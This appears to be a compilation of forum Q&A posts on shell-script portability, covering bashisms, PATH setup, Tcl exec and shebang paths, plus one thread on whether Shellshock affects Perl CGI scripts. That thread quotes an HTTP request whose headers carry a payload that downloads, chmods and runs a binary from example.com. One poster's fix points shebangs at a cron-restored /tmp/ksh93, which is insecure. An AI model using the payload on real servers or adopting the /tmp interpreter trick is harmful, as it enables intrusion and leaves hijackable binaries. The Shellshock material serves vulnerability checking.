I need to deploy some scripts that were written for bash to various Linux/Unix machines where bash may not be available.
I do not know whether the original author really required bash to run the scripts, or simply used it because it is the default shell on modern Linux distributions.
Do you know of any script, application, or online service that takes a shell script as input, runs syntax checks against the grammars of several common shells, and returns some kind of validation estimate, such as "This script should run under one of the following shells: ash, bash, ksh, zsh"?
I don't know of any tool that does exactly what you're asking for, but checkbashisms can at least check a script for non-portable syntax. IIRC, it's packaged in Ubuntu as part of the devscripts package.
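For example, on Debian/Ubuntu (deploy.sh is a hypothetical script name):

sudo apt-get install devscripts   # checkbashisms ships in this package
checkbashisms deploy.sh           # warns about each suspected bashism it finds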
Ubuntu also switched to dash as the default /bin/sh and wrote a helpful page about coping with that change. I've found it to be a good reference.
Yesterday, CVE-2014-6271, the bash Shellshock vulnerability, was reported.
I am trying to understand if it can affect my server via my Perl CGI scripts.
Can my code be affected in a malicious way? What would my code need to do to be affected, and what should I check to verify this?
Yes, it affects Perl if your CGI script spawns subshells, e.g. using the system() or open() functions or backticks. See this excellent Red Hat blog post; note that the post is not Red Hat specific in any significant way.
Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!
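A widely circulated one-liner to test whether the installed bash is vulnerable (harmless on a patched version):

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If it prints "vulnerable" before the test message, your bash needs the fix.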
You could try sending specially crafted strings to the HTTP server as the Referer, Cookie, Host, or Accept headers, which are then passed (as environment variables) to bash CGI scripts:
GET / HTTP/1.0
User-Agent: Thanks-Rob
Cookie: () { :; }; wget -O /tmp/besh http://example.com/nginx; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://example.com/nginx; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://example.com/nginx; chmod 777 /tmp/besh; /tmp/besh;
Accept: */*
See https://gist.github.com/anonymous/929d622f3b36b00c0be1 for a real-world example of malware that was seen in the wild.
If your Perl scripts never invoke a shell (via system, open, or backticks), you should be safe.
See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
The main question here is: is there a standard method of writing UNIX shell scripts that will run on multiple UNIX platforms?
For example, we have many hosts running different flavours of UNIX (Solaris, Linux) at different versions, all with slightly different file-system layouts. Some hosts have whoami in /usr/local/gnu/bin/ and some in /usr/bin/.
All of our scripts seem to deal with this in a slightly different way. Some have case statements on the architecture:
case "`/script/that/determines/arch`" in
sunos-*) WHOAMI=`/usr/local/gnu/bin/whoami` ;;
*) WHOAMI=`/usr/bin/whoami` ;;
esac
With this approach you know exactly what binary is being executed, but it's pretty cumbersome if there are lots of commands being executed.
Some just set the PATH (based on the arch script above) and call commands by just their name. This is convenient, but you lose control over which command you run, e.g. if you have:
/bin/foo
/bin/bar
/other/bin/foo
/other/bin/bar
You wouldn't be able to use both /bin/foo and /other/bin/bar.
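For instance, a minimal sketch of the PATH-based approach, reusing the hypothetical arch-detection script from above:

case "`/script/that/determines/arch`" in
    sunos-*) PATH=/usr/local/gnu/bin:/usr/bin ;;
    *)       PATH=/usr/bin:/bin ;;
esac
export PATH

whoami    # resolves to whichever whoami appears first in PATH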
Another approach I could think of would be to have a local directory on each host with symlinks to each binary needed on that host. E.g.:
Solaris host:
/local-bin/whoami -> /usr/local/gnu/bin/whoami
/local-bin/ps -> /usr/ucb/ps
Linux host:
/local-bin/whoami -> /usr/bin/whoami
/local-bin/ps -> /bin/ps
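A sketch of how such a symlink directory might be populated (a one-time setup per host; the paths follow the examples above):

mkdir -p /local-bin
case "`uname -s`" in
    SunOS) ln -sf /usr/local/gnu/bin/whoami /local-bin/whoami
           ln -sf /usr/ucb/ps /local-bin/ps ;;
    Linux) ln -sf /usr/bin/whoami /local-bin/whoami
           ln -sf /bin/ps /local-bin/ps ;;
esac
# Scripts then put it first in PATH:
PATH=/local-bin:$PATH; export PATH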
What other approaches do people use? Please don't just say write the script in Python... there are some tasks where bash is the most succinct and practical means of getting a simple task accomplished.
I delegate all this to my .profile, which has an elaborate series of internal functions that probe likely directories to add to the PATH. This approach works well enough everywhere except OS X, where I believe it is basically impossible because Darwin, Fink, and Ports each want to control your PATH.
If I cared about ambiguity (multiple instances of foo in different directories on my PATH), I would modify the functions so as to identify all ambiguous commands and require manual resolution. But for my environment, this has never been an issue. My main concern has been to have a single .profile that runs on Debian, Red Hat, Solaris, BSD, and so on. The 'try every directory that could possibly work' approach works well enough.
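A minimal sketch of that idea (the function name and directory list are illustrative):

# Append each candidate directory to PATH only if it exists on this host.
add_to_path() {
    for d in "$@"; do
        [ -d "$d" ] && PATH="$PATH:$d"
    done
}
add_to_path /usr/local/gnu/bin /usr/ucb /opt/sfw/bin /usr/local/bin
export PATH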
To set PATH to POSIX-compliant directories you can do the following at the beginning of your Bash scripts:
unset PATH
PATH="$(PATH=/bin:/usr/bin getconf PATH)"
export PATH
If you know you can use Bash across different Unix systems, you may use shell builtins instead of external commands to improve portability as well. Example:
help type
type -a type
type -P ls # replaces: which ls
To disable alias / function lookup for commands such as find, ls, ... in Bash you may use the command builtin. Example:
help command
command ls -l
If you want to be 100% sure to execute a specific command located in a specific directory, using the full executable path seems the way to go. First match wins in PATH lookup!
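For instance, with the hypothetical layout from the earlier question, PATH order decides which foo you get:

PATH=/other/bin:/bin
foo          # runs /other/bin/foo, the first match in PATH
/bin/foo     # a full path bypasses PATH lookup entirely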
Bash commands are available from an interactive tclsh session. E.g. in a tclsh session you can have
% ls
instead of
$ exec ls
However, you can't have a Tcl script that calls bash commands directly (i.e. without exec).
How can I make tclsh recognize bash commands while interpreting Tcl script files, just as it does in an interactive session?
I guess there is some Tcl package (or something like that) which is loaded automatically when launching an interactive session to support direct calls of bash commands. How can I load it manually in Tcl script files?
If you want to have specific utilities available in your scripts, write bridging procedures:
proc ls args {
    exec {*}[auto_execok ls] {*}$args
}
That will even work (with obvious adaptation) for most shell builtins or on Windows. (To be fair, you usually don't want to use an external ls; the internal glob command usually suffices, sometimes with extra help from some file subcommands.) Some commands need a little more work (e.g., redirecting input so it comes from the terminal, with an extra <@stdin or </dev/tty; that's needed for stty on some platforms) but that works reasonably well.
However, if what you're asking for is to have arbitrary execution of external programs without any extra code to mark that they are external, that's considered to be against the ethos of Tcl. The issue is that it makes the code quite a lot harder to maintain; it's not obvious that you're doing an expensive call-out instead of using something (relatively) cheap that's internal. Putting in the exec in that case isn't that onerous…
What's going on here is that the unknown proc gets invoked when you type a command like ls, because that's not an existing Tcl command. By default, unknown checks whether the command was invoked from an interactive session at the top level (not inside a proc body), and if so it looks for an executable of that name on the path. You can get something like this in scripts by writing your own proc unknown.
For a good start on this, examine the output of
info body unknown
One thing you should know is that ls is not a Bash command; it's a standalone utility. The clue for how tclsh runs such utilities is right there in its name: sh means "shell", so tclsh is the rough equivalent of Bash in that Bash is also a shell. Tcl != tclsh, so you have to use exec.
I have a bunch of scripts (which can't be modified) written on Windows. Windows allows relative paths in its #! lines. We are trying to run these scripts on Unix, but Bash only seems to respect absolute paths in its #! directives. I've looked around but haven't been able to locate an option in Bash or a program designed to rewrite the interpreter name. Is it possible to override that behaviour, perhaps even by using a different shell?
Typically you can just specify the binary to execute the script, which will cause the #! to be ignored. So, if you have a Python script that looks like:
#!..\bin\python2.6
# code would be here.
On Unix/Linux you can just say:
prompt$ python2.6 <scriptfile>
And it'll execute using the command line binary. I view the hashbang line as one which asks the operating system to use the binary specified on the line, but you can override it by not executing the script as a normal executable.
Worst case you could write some wrapper scripts that would explicitly tell the interpreter to execute the code in the script file for all the platforms that you'd be using.
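For example, a minimal wrapper (the script name, interpreter, and path are illustrative):

#!/bin/sh
# run-myscript: invoke the interpreter explicitly so the Windows-style
# relative shebang inside myscript.py is never consulted.
exec python2.6 /opt/scripts/myscript.py "$@"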
I manage a large number of shell (ksh) scripts on server A. Each script begins with the line...
#!/usr/bin/ksh
When I deploy to machines B, C, and D I frequently need to use a different path, such as /bin/ksh, /usr/local/bin/ksh, or even /usr/dt/bin/ksh. Assume I am unable to install a new version of ksh and unable to create links in any protected directories such as /usr/local/bin. At the moment I have a sed script that modifies all the scripts, but I would prefer not to do this. I would like to standardize the header so that it no longer needs to be changed from server to server. I don't mind using something like
#!~/ksh
And creating a link that exists on every server, but I have had problems in the past with "~" resolving to home when using rsh (or maybe it was ssh) to call a script (on AIX specifically, I think). Another option might be to create a link in my home directory, ensure that directory is first in my PATH, and simply use
#!ksh
Looking for a good solution. Thanks.
Update 8/26/11 - Here is the solution I came up with. The installation script looks for the various versions of ksh installed on the server and then copies one of the ksh93 binaries to /tmp/ksh93. The scripts in the framework all refer to #!/tmp/ksh93, so they don't need to be changed from one server to the other. The script also sets things up so that if the file is ever removed from /tmp, it will immediately be put back the next time a scheduled task runs, which is at a minimum every minute.
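A minimal sketch of that installation step (the candidate list is illustrative; a real script would also verify that the binary it found is actually ksh93):

#!/bin/sh
# Copy the first usable ksh found on this host to a fixed, writable path.
for k in /usr/bin/ksh93 /usr/local/bin/ksh /usr/dt/bin/ksh /bin/ksh /usr/bin/ksh; do
    if [ -x "$k" ]; then
        cp "$k" /tmp/ksh93 && chmod 755 /tmp/ksh93
        break
    fi
done
# All framework scripts can then begin with: #!/tmp/ksh93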
As rettops noted, you can use:
#!/usr/bin/env ksh
This will likely work for you. However, there can be some drawbacks. See Wikipedia on Shebang for a fairly thorough discussion.
#! /usr/bin/env ksh
will use whatever ksh is first in the user's PATH.